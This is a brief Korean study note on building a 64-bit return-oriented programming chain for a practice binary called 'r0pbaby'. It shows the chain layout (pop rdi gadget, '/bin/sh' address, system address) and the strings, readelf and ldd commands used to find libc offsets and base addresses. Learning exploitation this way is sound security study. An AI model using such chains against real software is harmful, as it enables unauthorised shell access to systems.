64bit rop tip

[buff] +  gadget [pop rdi; ret] + [/bin/sh string addr] + [system addr]

/bin/sh 문자열 offset 확인

babyhack@ubuntu:~/tmp$ strings -a -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"

 17ccdb /bin/sh

 

system 함수 offset 확인

babyhack@ubuntu:~/tmp$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"

   223: 000000000012b2c0    70 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.2.5

   577: 0000000000046640    45 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE

  1337: 0000000000046640    45 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.2.5

라이브러리 주소 확인

babyhack@ubuntu:~/tmp$ ldd ./r0pbaby 

 linux-vdso.so.1 =>  (0x00007ffca2aeb000)

 libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f2b712e3000)

 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f2b70f1e000)

 /lib64/ld-linux-x86-64.so.2 (0x00007f2b716ea000)

Ref.http://crattack.tistory.com/tag/64bit%20ROP